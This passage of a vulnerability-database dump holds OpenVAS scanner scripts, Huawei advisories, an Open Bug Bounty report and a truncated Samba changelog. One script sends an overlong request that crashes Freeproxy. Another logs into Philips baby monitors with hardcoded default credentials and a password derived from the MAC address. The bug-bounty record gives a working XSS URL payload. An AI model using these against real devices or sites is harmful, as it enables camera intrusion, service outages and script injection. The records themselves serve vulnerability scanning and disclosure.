Level: Application\");\n\n script_tag(name:\"affected\", value:\"Freeproxy Internet Suite 4.10.1751\");\n\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore. General\n solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n\n script_xref(name:\"URL\", value:\"https://www.exploit-db.com/exploits/39517/\");\n\n script_category(ACT_DENIAL);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Denial of Service\");\n script_dependencies(\"gb_freeproxy_internet_suite_detect.nasl\");\n script_mandatory_keys(\"Freeproxy/installed\");\n script_require_ports(\"Services/www\", 8080);\n\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\n\nfreePort = get_app_port(cpe:CPE);\nif(!freePort){\n exit(0);\n}\n\nif(http_is_dead(port:freePort)){\n exit(0);\n}\n\njunk = crap( data:\"A\", length:5000 );\n\nuseragent = get_http_user_agent();\n\nbuffer = 'GET http://::../'+junk+'/index.html HTTP/1.1\\r\\n'+\n \t 'Host: www.xyz.com\\r\\n'+\n\t 'User-Agent: ' + useragent + '\\r\\n' +\n\t '\\r\\n\\r\\n';\n\nreq = http_keepalive_send_recv(port:freePort, data:buffer);\n\nsleep(3);\n\nif(http_is_dead(port:freePort))\n{\n security_message(port:freePort);\n}\nexit(0);\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-09-01T23:46:20", "references": ["http://www.ifc0nfig.com/a-close-look-at-the-philips-in-sight-ip-camera-range/", "https://www.rapid7.com/docs/Hacking-IoT-A-Case-Study-on-Baby-Monitor-Exposures-and-Vulnerabilities.pdf"], "pluginID": "1361412562310111097", "description": "The remote Philips In.Sight Device has default credentials set.", "edition": 4, "reporter": "This script is Copyright (C) 2016 SCHUTZWERK GmbH", "published": "2016-04-24T00:00:00", "title": "Philips In.Sight Default Webinterface Credentials", "type": "openvas", "enchantments": {"score": {"vector": "NONE", "value": 7.5}}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-2882"], "modified": "2018-08-16T00:00:00", "id": "OPENVAS:1361412562310111097", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310111097", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: sw_philips_insight_default_web_credentials.nasl 11008 2018-08-16 13:26:16Z cfischer $\n#\n# Philips In.Sight Default Webinterface Credentials\n#\n# Authors:\n# Christian Fischer <info@schutzwerk.com>\n#\n# Copyright:\n# Copyright (c) 2016 SCHUTZWERK GmbH\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.111097\");\n script_version(\"$Revision: 11008 $\");\n script_cve_id(\"CVE-2015-2882\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_name(\"Philips In.Sight Default Webinterface Credentials\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-08-16 15:26:16 +0200 (Thu, 16 Aug 2018) $\");\n script_tag(name:\"creation_date\", value:\"2016-04-24 12:00:00 +0200 (Sun, 24 Apr 2016)\");\n script_category(ACT_ATTACK);\n script_family(\"Default Accounts\");\n script_copyright(\"This script is Copyright (C) 2016 SCHUTZWERK GmbH\");\n script_dependencies(\"find_service.nasl\", \"nmap_mac.nasl\");\n script_require_ports(\"Services/www\", 80);\n script_exclude_keys(\"Settings/disable_cgi_scanning\");\n\n script_xref(name:\"URL\", value:\"http://www.ifc0nfig.com/a-close-look-at-the-philips-in-sight-ip-camera-range/\");\n script_xref(name:\"URL\", value:\"https://www.rapid7.com/docs/Hacking-IoT-A-Case-Study-on-Baby-Monitor-Exposures-and-Vulnerabilities.pdf\");\n\n script_tag(name:\"summary\", value:\"The remote Philips In.Sight Device has default credentials set.\");\n script_tag(name:\"impact\", value:\"This issue may be exploited by a remote attacker to gain\n access to sensitive information or modify system configuration.\");\n script_tag(name:\"vuldetect\", value:\"Connect to the telnet service and try to login with default credentials.\");\n script_tag(name:\"insight\", value:\"It was possible to login with default credentials of admin:M100-4674448 or user:M100-4674448\");\n script_tag(name:\"solution\", value:\"No known solution was made available for at least one year\n since the disclosure of this vulnerability. Likely none will be provided anymore. General\n solution options are to upgrade to a newer release, disable respective features, remove the\n product or replace the product by another one.\");\n\n script_tag(name:\"solution_type\", value:\"WillNotFix\");\n script_tag(name:\"qod_type\", value:\"remote_app\");\n\n exit(0);\n}\n\ninclude(\"http_func.inc\");\ninclude(\"http_keepalive.inc\");\ninclude(\"misc_func.inc\");\n\nport = get_http_port( default:80 );\n\nres = http_get_cache( item: \"/\", port:port );\n\nif( \"Philips InSight Wireless Home Monitor\" >< res ) {\n\n # nb: MAC address set by nmap_mac.nasl\n mac = get_kb_item( \"Host/mac_address\" );\n\n if( mac ) {\n password = \"i\" + substr( hexstr( MD5( mac) ), 0, 9);\n creds = make_array( \"admin\", password,\n \"user\", \"M100-4674448\" );\n } else {\n creds = make_array( \"admin\", \"M100-4674448\",\n \"user\", \"M100-4674448\" );\n }\n\n urls = make_list( \"/cgi-bin/v1/camera\",\n \"/cgi-bin/v1/firmware/version\",\n \"/cgi-bin/img-0.cgi\",\n \"/cgi-bin/v1/stream0\",\n \"/cgi-bin/v1/users/admin\" );\n\n useragent = get_http_user_agent();\n host = http_host_name( port:port );\n\n foreach url( urls ) {\n\n foreach cred ( keys( creds ) ) {\n\n req = http_get( item:url, port:port );\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( \"401 Unauthorized\" >!< res || 'WWW-Authenticate: Digest realm=\"Authorization required\"' >!< res || \"nonce\" >!< res ) continue;\n\n nonce = eregmatch( pattern:'nonce=\"([^\"]+)', string:res );\n if( isnull( nonce[1] ) ) continue;\n\n nonce = nonce[1];\n cnonce = rand_str( charset:\"abcdefghijklmnopqrstuvwxyz0123456789\", length:16 );\n qop = \"auth\";\n nc = \"00000001\";\n\n ha1 = hexstr( MD5( string( cred,\":Authorization required:\",creds[cred] ) ) );\n ha2 = hexstr( MD5( string( \"GET:\",url ) ) );\n response = hexstr( MD5( string( ha1,\":\",nonce,\":\",nc,\":\",cnonce,\":\",qop,\":\",ha2 ) ) );\n\n req = 'GET ' + url + ' HTTP/1.1\\r\\n' +\n 'Host: ' + host + '\\r\\n' +\n 'User-Agent: ' + useragent +'\\r\\n' +\n 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\\r\\n' +\n 'Accept-Language: en-US,en;q=0.5\\r\\n' +\n 'Content-Type: application/x-www-form-urlencoded\\r\\n' +\n 'Authorization: Digest username=\"' + cred + '\", realm=\"Authorization required\", ' +\n 'nonce=\"' + nonce + '\", uri=\"' + url + '\", ' +\n 'response=\"' + response + '\", qop=' + qop + ', nc=' + nc + ', ' +\n 'cnonce=\"' + cnonce + '\"\\r\\n' +\n '\\r\\n';\n res = http_keepalive_send_recv( port:port, data:req );\n\n if( res =~ \"HTTP/1\\.. 200\" ) {\n VULN = TRUE;\n report += report_vuln_url( url:url, port:port ) + \", Credentials: \" + cred + \":\" + creds[cred] + '\\n';\n }\n }\n }\n}\n\nif( VULN ) {\n security_message( port:port, data:report );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "huawei": [{"lastseen": "2017-12-01T15:02:41", "references": [], "description": "There are multiple vulnerabilities in Intel Management Engine (ME) firmware. Some Huawei devices are affected for using related Intel products.\nMultiple buffer overflows in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow attacker with local access to the system to execute arbitrary code. (Vulnerability ID: HWPSIRT-2017-11005)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5705.\n\nMultiple privilege escalations in kernel in Intel Manageability Engine Firmware 11.0/11.5/11.6/11.7/11.10/11.20 allow unauthorized process to access privileged content via unspecified vector. (Vulnerability ID: HWPSIRT-2017-11006)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5708.\n\nMultiple buffer overflows in Active Management Technology (AMT) in Intel Manageability Engine Firmware 8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 allow attacker with local access to the system to execute arbitrary code with AMT execution privilege. (Vulnerability ID: HWPSIRT-2017-11007)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5711.\n\nBuffer overflow in Active Management Technology (AMT) in Intel Manageability Engine Firmware 8.x/9.x/10.x/11.0/11.5/11.6/11.7/11.10/11.20 allows attacker with remote Admin access to the system to execute arbitrary code with AMT execution privilege. (Vulnerability ID: HWPSIRT-2017-11008)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5712.\n\nMultiple buffer overflows in kernel in Intel Server Platform Services Firmware 4.0 allow attacker with local access to the system to execute arbitrary code. (Vulnerability ID: HWPSIRT-2017-11009)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5706.\n\nMultiple privilege escalations in kernel in Intel Server Platform Services Firmware 4.0 allows unauthorized process to access privileged content via unspecified vector. (Vulnerability ID: HWPSIRT-2017-11010)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5709.\n\nMultiple buffer overflows in kernel in Intel Trusted Execution Engine Firmware 3.0 allow attacker with local access to the system to execute arbitrary code. (Vulnerability ID: HWPSIRT-2017-11011)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5707.\n\nMultiple privilege escalations in kernel in Intel Trusted Execution Engine Firmware 3.0 allows unauthorized process to access privileged content via unspecified vector. (Vulnerability ID: HWPSIRT-2017-11012)\nThis vulnerability has been assigned a CVE ID: CVE-2017-5710.\n\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link:\nhttp://www.huawei.com/en/psirt/security-advisories/huawei-sa-20171201-01-intel-en", "edition": 1, "reporter": "Huawei Technologies", "published": "2017-12-01T00:00:00", "type": "huawei", "title": "Security Advisory - Multiple Vulnerabilities in Intel Management Engine Firmware", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "affectedSoftware": [{"name": "2288H V5", "version": "V100R005C00", "operator": "eq"}, {"name": "1288H V5", "version": "V100R005C00", "operator": "eq"}], "bulletinFamily": "software", "cvelist": ["CVE-2017-5709", "CVE-2017-5708", "CVE-2017-5710", "CVE-2017-5706", "CVE-2017-5711", "CVE-2017-5705", "CVE-2017-5712", "CVE-2017-5707"], "modified": "2017-12-01T00:00:00", "href": "http://www.huawei.com/en/psirt/security-advisories/2017/huawei-sa-20171201-01-intel-en", "id": "HUAWEI-SA-20171201-01-INTEL", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2016-09-05T13:35:26", "references": [], "edition": 1, "description": "Some Huawei smart phones have two DoS (Denial of Service) security vulnerabilities in the HIFI driver. An attacker may trick a user into installing a malicious application and use the application to input null pointer as parameter, which can reboot the system. (Vulnerability ID: HWPSIRT-2015-10038 and HWPSIRT-2015-11008)\nThe HWPSIRT-2015-11008 vulnerability has been assigned Common Vulnerabilities and Exposures (CVE) ID: CVE-2015-8337.\nHuawei has released software updates to fix these vulnerabilities. This advisory is available at the following link: http://www.huawei.com/en/security/psirt/security-bulletins/security-advisories/hw-465304.htm", "reporter": "Huawei Technologies", "published": "2015-12-09T00:00:00", "enchantments": {"score": {"vector": "NONE", "value": 4.3}}, "type": "huawei", "title": "Security Advisory - Two DoS Vulnerabilities in the HIFI Driver of Huawei Smart Phone", "bulletinFamily": "software", "affectedSoftware": [{"name": "Mate7", "version": "Versions earlier than MT7-UL00C17B354", "operator": "eq"}, {"name": "P8", "version": "Versions earlier than GRA-UL10C00B220", "operator": "eq"}, {"name": "P8", "version": "Versions earlier than GRA-TL00C01B220SP01", "operator": "eq"}, {"name": "Mate7", "version": "Versions earlier than MT7-TL00C01B354", "operator": "eq"}, {"name": "Mate S", "version": "CRR-CL00C92B153 and earlier versions", "operator": "eq"}, {"name": "Mate7", "version": "Versions earlier than MT7-TL10C00B354", "operator": "eq"}, {"name": "P8", "version": "Versions earlier than GRA-CL00C92B220", "operator": "eq"}, {"name": "P8", "version": "Versions earlier than GRA-UL00C00B220", "operator": "eq"}, {"name": "P8", "version": "Versions earlier than GRA-CL10C92B220", "operator": "eq"}, {"name": "Mate S", "version": "CRR-UL00C00B153 and earlier versions", "operator": "eq"}, {"name": "Mate7", "version": "Versions earlier than MT7-CL00C92B354", "operator": "eq"}, {"name": "Mate S", "version": "CRR-TL00C01B153SP01 and earlier versions", "operator": "eq"}], "cvelist": ["CVE-2015-8337"], "modified": "2016-02-02T00:00:00", "id": "HUAWEI-SA-20151209-01-HIFI", "href": "http://www.huawei.com/en/psirt/security-advisories/2015/hw-465304", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}], "openbugbounty": [{"lastseen": "2017-11-26T21:51:37", "_object_types": ["robots.models.openbugbounty.OpenbugbountyBulletin", "robots.models.base.Bulletin"], "references": [], "enchantments_done": [], "openbugbounty": {"mirror": "", "patchStatus": "patched"}, "description": "##### Vulnerable URL:\n \n \n https://www.bumin.co.kr/busan/media/media01.html?jb_code=%22%3E%3Cscript%3E%20alert(%27XSSPOSED%27%20)%3C/script%3E&jb;_idx=11008&jb;_group=326&jb;_step=0&jb;_depth=3260&search;_key=&search;_keyword=&page;==&jb;_type=\n \n\n##### Details:\n\nDescription| Value \n---|--- \nPatched:| Yes, at 25.11.2017 \nLatest check for patch:| 25.11.2017 20:44 GMT \nVulnerability type:| XSS \nVulnerability status:| Publicly disclosed \nAlexa Rank| 1796698 \nVIP website status:| No \nCheck bumin.co.kr SSL connection:| (Grade: F) \n \n##### Coordinated Disclosure Timeline:\n\nDescription| Value \n---|--- \nVulnerability submitted via Open Bug Bounty| 14 May, 2017 23:37 GMT \nGeneric security notifications sent to website owner| 15 May, 2017 06:12 GMT \nNotification sent to subscribers (without technical details)| 15 May, 2017 10:17 GMT \nVulnerability details disclosed by researcher| 22 May, 2017 06:15 GMT \nVulnerability patched by the website owner| 25 November, 2017 20:44 GMT\n", "reporter": "keritzy", "published": "2017-05-14T23:37:00", "type": "openbugbounty", "title": "bumin.co.kr XSS vulnerability ", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "bugbounty", "cvelist": [], "_object_type": "robots.models.openbugbounty.OpenbugbountyBulletin", "modified": "2017-11-25T20:44:00", "href": "https://www.openbugbounty.org/reports/237115/", "id": "OBB:237115", "cvss": {"score": 0.0, "vector": "NONE"}}], "nessus": [{"lastseen": "2018-09-01T23:36:41", "references": ["https://bugzilla.opensuse.org/show_bug.cgi?id=964023", "https://bugzilla.opensuse.org/show_bug.cgi?id=942716", "https://bugzilla.opensuse.org/show_bug.cgi?id=973032", "https://bugzilla.opensuse.org/show_bug.cgi?id=949022", "https://bugzilla.opensuse.org/show_bug.cgi?id=912457", "https://bugzilla.opensuse.org/show_bug.cgi?id=971965", "https://bugzilla.opensuse.org/show_bug.cgi?id=966271", "https://bugzilla.opensuse.org/show_bug.cgi?id=973034", "https://bugzilla.opensuse.org/show_bug.cgi?id=924519", "https://bugzilla.opensuse.org/show_bug.cgi?id=914279", "https://bugzilla.opensuse.org/show_bug.cgi?id=968973", "https://bugzilla.opensuse.org/show_bug.cgi?id=972197", "https://bugzilla.opensuse.org/show_bug.cgi?id=947552", "https://bugzilla.opensuse.org/show_bug.cgi?id=958586", "https://bugzilla.opensuse.org/show_bug.cgi?id=973036", "https://bugzilla.opensuse.org/show_bug.cgi?id=973031", "https://bugzilla.opensuse.org/show_bug.cgi?id=898031", "https://bugzilla.opensuse.org/show_bug.cgi?id=919309", "https://bugzilla.opensuse.org/show_bug.cgi?id=973033", "https://bugzilla.opensuse.org/show_bug.cgi?id=973832", "https://bugzilla.opensuse.org/show_bug.cgi?id=958585", "https://bugzilla.opensuse.org/show_bug.cgi?id=917376", "https://bugzilla.opensuse.org/show_bug.cgi?id=968222", "https://bugzilla.opensuse.org/show_bug.cgi?id=913238", "https://bugzilla.opensuse.org/show_bug.cgi?id=958583", "https://bugzilla.opensuse.org/show_bug.cgi?id=958584", "https://bugzilla.opensuse.org/show_bug.cgi?id=974629", "https://bugzilla.opensuse.org/show_bug.cgi?id=901813", "https://bugzilla.opensuse.org/show_bug.cgi?id=958581", "https://bugzilla.opensuse.org/show_bug.cgi?id=958582", "https://bugzilla.opensuse.org/show_bug.cgi?id=913547", "https://bugzilla.opensuse.org/show_bug.cgi?id=936862", "https://bugzilla.opensuse.org/show_bug.cgi?id=946051"], "pluginID": "90558", "description": "samba was updated to version 4.2.4 to fix 14 security issues.\n\nThese security issues were fixed :\n\n - CVE-2015-5370: DCERPC server and client were vulnerable to DOS and MITM attacks (bsc#936862).\n\n - CVE-2016-2110: A man-in-the-middle could have downgraded NTLMSSP authentication (bsc#973031).\n\n - CVE-2016-2111: Domain controller netlogon member computer could have been spoofed (bsc#973032).\n\n - CVE-2016-2112: LDAP conenctions were vulnerable to downgrade and MITM attack (bsc#973033).\n\n - CVE-2016-2113: TLS certificate validation were missing (bsc#973034).\n\n - CVE-2016-2115: Named pipe IPC were vulnerable to MITM attacks (bsc#973036).\n\n - CVE-2016-2118: 'Badlock' DCERPC impersonation of authenticated account were possible (bsc#971965).\n\n - CVE-2015-3223: Malicious request can cause Samba LDAP server to hang, spinning using CPU (boo#958581).\n\n - CVE-2015-5330: Remote read memory exploit in LDB (boo#958586).\n\n - CVE-2015-5252: Insufficient symlink verification (file access outside the share)(boo#958582).\n\n - CVE-2015-5296: No man in the middle protection when forcing smb encryption on the client side (boo#958584).\n\n - CVE-2015-5299: Currently the snapshot browsing is not secure thru windows previous version (shadow_copy2) (boo#958583).\n\n - CVE-2015-8467: Fix Microsoft MS15-096 to prevent machine accounts from being changed into user accounts (boo#958585).\n\n - CVE-2015-7560: Getting and setting Windows ACLs on symlinks can change permissions on link target (boo#968222).\n\nThese non-security issues were fixed :\n\n - Fix samba.tests.messaging test and prevent potential tdb corruption by removing obsolete now invalid tdb_close call; (boo#974629).\n\n - Align fsrvp feature sources with upstream version.\n\n - Obsolete libsmbsharemodes0 from samba-libs and libsmbsharemodes-devel from samba-core-devel;\n (boo#973832).\n\n - s3:utils/smbget: Fix recursive download; (bso#6482).\n\n - s3: smbd: posix_acls: Fix check for setting u:g:o entry on a filesystem with no ACL support; (bso#10489).\n\n - docs: Add example for domain logins to smbspool man page; (bso#11643).\n\n - s3-client: Add a KRB5 wrapper for smbspool; (bso#11690).\n\n - loadparm: Fix memory leak issue; (bso#11708).\n\n - lib/tsocket: Work around sockets not supporting FIONREAD; (bso#11714).\n\n - ctdb-scripts: Drop use of 'smbcontrol winbindd ip-dropped ...'; (bso#11719).\n\n - s3:smbd:open: Skip redundant call to file_set_dosmode when creating a new file; (bso#11727).\n\n - param: Fix str_list_v3 to accept ';' again; (bso#11732).\n\n - Real memeory leak(buildup) issue in loadparm;\n (bso#11740).\n\n - Obsolete libsmbclient from libsmbclient0 and libpdb-devel from libsamba-passdb-devel while not providing it; (boo#972197).\n\n - Upgrade on-disk FSRVP server state to new version;\n (boo#924519).\n\n - Only obsolete but do not provide gplv2/3 package names;\n (boo#968973).\n\n - Enable clustering (CTDB) support; (boo#966271).\n\n - s3: smbd: Fix timestamp rounding inside SMB2 create;\n (bso#11703); (boo#964023).\n\n - vfs_fruit: Fix renaming directories with open files;\n (bso#11065).\n\n - Fix MacOS finder error 36 when copying folder to Samba;\n (bso#11347).\n\n - s3:smbd/oplock: Obey kernel oplock setting when releasing oplocks; (bso#11400).\n\n - Fix copying files with vfs_fruit when using vfs_streams_xattr without stream prefix and type suffix;\n (bso#11466).\n\n - s3:libsmb: Correctly initialize the list head when keeping a list of primary followed by DFS connections;\n (bso#11624).\n\n - Reduce the memory footprint of empty string options;\n (bso#11625).\n\n - lib/async_req: Do not install async_connect_send_test;\n (bso#11639).\n\n - docs: Fix typos in man vfs_gpfs; (bso#11641).\n\n - smbd: make 'hide dot files' option work with 'store dos attributes = yes'; (bso#11645).\n\n - smbcacls: Fix uninitialized variable; (bso#11682).\n\n - s3:smbd: Ignore initial allocation size for directory creation; (bso#11684).\n\n - Changing log level of two entries to from 1 to 3;\n (bso#9912).\n\n - vfs_gpfs: Re-enable share modes; (bso#11243).\n\n - wafsamba: Also build libraries with RELRO protection;\n (bso#11346).\n\n - ctdb: Strip trailing spaces from nodes file;\n (bso#11365).\n\n - s3-smbd: Fix old DOS client doing wildcard delete - gives a attribute type of zero; (bso#11452).\n\n - nss_wins: Do not run into use after free issues when we access memory allocated on the globals and the global being reinitialized; (bso#11563).\n\n - async_req: Fix non-blocking connect(); (bso#11564).\n\n - auth: gensec: Fix a memory leak; (bso#11565).\n\n - lib: util: Make non-critical message a warning;\n (bso#11566).\n\n - Fix winbindd crashes with samlogon for trusted domain user; (bso#11569); (boo#949022).\n\n - smbd: Send SMB2 oplock breaks unencrypted; (bso#11570).\n\n - ctdb: Open the RO tracking db with perms 0600 instead of 0000; (bso#11577).\n\n - manpage: Correct small typo error; (bso#11584).\n\n - s3: smbd: If EA's are turned off on a share don't allow an SMB2 create containing them; (bso#11589).\n\n - Backport some valgrind fixes from upstream master;\n (bso#11597).\n\n - s3: smbd: have_file_open_below() fails to enumerate open files below an open directory handle; (bso#11615).\n\n - docs: Fix some typos in the idmap config section of man 5 smb.conf; (bso#11619).\n\n - Remove redundant configure options while adding with-relro.\n\n - s3: smbd: Fix our access-based enumeration on 'hide unreadable' to match Windows; (bso#10252).\n\n - smbd: Fix file name buflen and padding in notify repsonse; (bso#10634).\n\n - kerberos: Make sure we only use prompter type when available; (bso#11038).\n\n - s3:ctdbd_conn: Make sure we destroy tevent_fd before closing the socket; (bso#11316).\n\n - dcerpc.idl: accept invalid dcerpc_bind_nak pdus;\n (bso#11327).\n\n - Fix a deadlock in tdb; (bso#11381).\n\n - s3: smbd: Fix mkdir race condition; (bso#11486).\n\n - pam_winbind: Fix a segfault if initialization fails;\n (bso#11502).\n\n - s3: dfs: Fix a crash when the dfs targets are disabled;\n (bso#11509).\n\n - s3: smbd: Fix opening/creating :stream files on the root share directory; (bso#11522).\n\n - net: Fix a crash with 'net ads keytab create';\n (bso#11528).\n\n - s3: smbd: Fix a crash in unix_convert() and a NULL pointer bug introduced by previous 'raw' stream fix (bso#11522); (bso#11535).\n\n - vfs_fruit: Return value of ad_pack in vfs_fruit.c;\n (bso#11543).\n\n - vfs_commit: Set the fd on open before calling SMB_VFS_FSTAT; (bso#11547).\n\n - Fix bug in smbstatus where the lease info is not printed; (bso#11549).\n\n - s3:smbstatus: Add stream name to share_entry_forall();\n (bso#11550).\n\n - Relocate the tmpfiles.d directory to the client package;\n (boo#947552).\n\n - Do not provide libpdb0 from libsamba-passdb0 but add it to baselibs.conf instead; (boo#942716).\n\n - Package /var/lib/samba/private/sock with 0700 permissions; (boo#946051).\n\n - auth/credentials: If credentials have principal set, they are not anonymous anymore; (bso#11265).\n\n - Fix stream names with colon with 'fruit:encoding = native'; (bso#11278).\n\n - s4:rpc_server/netlogon: Fix for NetApp; (bso#11291).\n\n - lib: Fix rundown of open_socket_out(); (bso#11316).\n\n - s3:lib: Fix some corner cases of open_socket_out_cleanup(); (bso#11316).\n\n - vfs:fruit: Implement copyfile style copy_chunk;\n (bso#11317).\n\n - ctdb-daemon: Return correct sequence number for CONTROL_GET_DB_SEQNUM; (bso#11398).\n\n - ctdb-scripts: Support monitoring of interestingly named VLANs on bonds; (bso#11399).\n\n - ctdb-daemon: Improve error handling for running event scripts; (bso#11431).\n\n - ctdb-daemon: Check if updates are in flight when releasing all IPs; (bso#11432).\n\n - ctdb-build: Fix building of PCP PMDA module;\n (bso#11435).\n\n - Backport dcesrv_netr_DsRGetDCNameEx2 fixes; (bso#11454).\n\n - vfs_fruit: Handling of empty resource fork; (bso#11467).\n\n - Avoid quoting problems in user's DNs; (bso#11488).\n\n - s3-auth: Fix 'map to guest = Bad uid'; (bso#9862).\n\n - s4:lib/tls: Fix build with gnutls 3.4; (bso#8780).\n\n - s4.2/fsmo.py: Fixed fsmo transfer exception;\n (bso#10924).\n\n - winbindd: Sync secrets.ldb into secrets.tdb on startup;\n (bso#10991).\n\n - Logon via MS Remote Desktop hangs; (bso#11061).\n\n - s3: lib: util: Ensure we read a hex number as %x, not %u; (bso#11068).\n\n - tevent: Add a note to tevent_add_fd(); (bso#11141).\n\n - s3:param/loadparm: Fix 'testparm --show-all-parameters';\n (bso#11170).\n\n - s3-unix_msg: Remove socket file after closing socket fd;\n (bso#11217).\n\n - smbd: Fix a use-after-free; (bso#11218); (boo#919309).\n\n - s3-rpc_server: Fix rpc_create_tcpip_sockets() processing of interfaces; (bso#11245).\n\n - s3:smb2: Add padding to last command in compound requests; (bso#11277).\n\n - Add IPv6 support to ADS client side LDAP connects;\n (bso#11281).\n\n - Add IPv6 support for determining FQDN during ADS join;\n (bso#11282).\n\n - s3: IPv6 enabled DNS connections for ADS client;\n (bso#11283).\n\n - Fix invalid write in ctdb_lock_context_destructor;\n (bso#11293).\n\n - Excessive cli_resolve_path() usage can slow down transmission; (bso#11295).\n\n - vfs_fruit: Add option 'veto_appledouble'; (bso#11305).\n\n - tstream: Make socketpair nonblocking; (bso#11312).\n\n - idmap_rfc2307: Fix wbinfo '--gid-to-sid' query;\n (bso#11313).\n\n - Group creation: Add msSFU30Name only when --nis-domain was given; (bso#11315).\n\n - tevent_fd needs to be destroyed before closing the fd;\n (bso#11316).\n\n - Build fails on Solaris 11 with '‘PTHREAD_MUTEX_ROBUST’ undeclared';\n (bso#11319).\n\n - smbd/trans2: Add a useful diagnostic for files with bad encoding; (bso#11323).\n\n - Change sharesec output back to previous format;\n (bso#11324).\n\n - Robust mutex support broken in 1.3.5; (bso#11326).\n\n - Kerberos auth info3 should contain resource group ids available from pac_logon; winbindd:\n winbindd_raw_kerberos_login - ensure logon_info exists in PAC; (bso#11328); (boo#912457).\n\n - s3:smb2_setinfo: Fix memory leak in the defer_rename case; (bso#11329).\n\n - tevent: Fix CID 1035381 Unchecked return value;\n (bso#11330).\n\n - tdb: Fix CID 1034842 and 1034841 Resource leaks;\n (bso#11331).\n\n - s3: smbd: Use separate flag to track become_root()/unbecome_root() state; (bso#11339).\n\n - s3: smbd: Codenomicon crash in do_smb_load_module();\n (bso#11342).\n\n - pidl: Make the compilation of PIDL producing the same results if the content hasn't change; (bso#11356).\n\n - winbindd: Disconnect child process if request is cancelled at main process; (bso#11358).\n\n - vfs_fruit: Check offset and length for AFP_AfpInfo read requests; (bso#11363).\n\n - docs: Overhaul the description of 'smb encrypt' to include SMB3 encryption; (bso#11366).\n\n - s3:auth_domain: Fix talloc problem in connect_to_domain_password_server(); (bso#11367).\n\n - ncacn_http: Fix GNUism; (bso#11371).\n\n - Backport changes to use resource group sids obtained from pac logon_info; (bso#11328); (boo#912457).\n\n - Order winbind.service Before and Want nss-user-lookup target.\n\n - s3:smbXsrv: refactor duplicate code into smbXsrv_session_clear_and_logoff(); (bso#11182).\n\n - gencache: don't fail gencache_stabilize if there were records to delete; (bso#11260).\n\n - s3: libsmbclient: After getting attribute server, ensure main srv pointer is still valid; (bso#11186).\n\n - s4: rpc: Refactor dcesrv_alter() function into setup and send steps; (bso#11236).\n\n - s3: smbd: Incorrect file size returned in the response of 'FILE_SUPERSEDE Create'; (bso#11240).\n\n - Mangled names do not work with acl_xattr; (bso#11249).\n\n - nmbd rewrites browse.dat when not required; (bso#11254).\n\n - vfs_fruit: add option 'nfs_aces' that controls the NFS ACEs stuff; (bso#11213).\n\n - s3:smbd: Add missing tevent_req_nterror; (bso#11224).\n\n - vfs: kernel_flock and named streams; (bso#11243).\n\n - vfs_gpfs: Error code path doesn't call END_PROFILE;\n (bso#11244).\n\n - s4: libcli/finddcs_cldap: continue processing CLDAP until all addresses are used; (bso#11284).\n\n - ctdb: check for talloc_asprintf() failure; (bso#11201).\n\n - spoolss: purge the printer name cache on name change;\n (bso#11210); (boo#901813).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - vfs_fruit: also map characters below 0x20; (bso#11221).\n\n - ctdb: Coverity fix for CID 1291643; (bso#11201).\n\n - Multiplexed RPC connections are not handled by DCERPC server; (bso#11225).\n\n - Fix terminate connection behavior for asynchronous endpoint with PUSH notification flavors; (bso#11226).\n\n - ctdb-scripts: Fix bashism in ctdbd_wrapper script;\n (bso#11007).\n\n - ctdb: Fix CIDs 1125615, 1125634, 1125613, 1288201 and 1125553; (bso#11201).\n\n - SMB2 should cancel pending NOTIFY calls with DELETE_PENDING if the directory is deleted; (bso#11257).\n\n - s3:winbindd: make sure we remove pending io requests before closing client\n\n - 'sharesec' output no longer matches input format;\n (bso#11237).\n\n - waf: Fix systemd detection; (bso#11200).\n\n - CTDB: Fix portability issues; (bso#11202).\n\n - CTDB: Fix some IPv6-related issues; (bso#11203).\n\n - CTDB statd-callout does not scale; (bso#11204).\n\n - 'net ads dns gethostbyname' crashes with an error in TALLOC_FREE if you enter invalid values; 